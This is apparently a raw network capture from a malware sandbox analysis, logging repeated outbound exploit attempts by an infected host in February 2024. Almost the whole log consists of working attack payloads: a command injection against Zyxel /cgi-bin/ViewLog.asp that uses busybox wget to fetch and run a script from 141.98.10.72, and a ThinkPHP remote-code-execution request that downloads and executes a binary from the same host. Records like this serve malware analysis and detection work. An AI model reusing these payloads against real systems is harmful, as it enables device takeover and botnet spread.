                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:16.026695013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:18.874414921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:24.250391006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:35.001986027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:58.297499895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:41.304172993 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      148192.168.2.1534804112.216.115.5080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:14.015912056 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:15.578522921 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:15.895912886 CET321INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.21.4
                                                      Date: Wed, 14 Feb 2024 08:29:15 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.4</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      149192.168.2.154763231.43.30.798080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:14.021120071 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.746555090 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.981376886 CET94INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:29:14 GMT
                                                      Connection: Close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      150192.168.2.153943694.123.121.738080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:14.021744013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      151192.168.2.154799831.136.88.718080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:14.493546963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:15.162693024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:16.506561041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:19.386547089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:24.762353897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:35.514050007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:58.297379017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:41.304243088 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      152192.168.2.153569631.136.93.2008080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:14.493663073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:15.162671089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:16.506556988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:19.386435032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:24.762264013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:35.514029026 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:58.297367096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:41.304177999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      153192.168.2.153384631.200.74.1948080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:14.517339945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      154192.168.2.154142894.120.32.1998080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:14.517685890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:15.802683115 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:17.306521893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:20.410406113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:26.554297924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
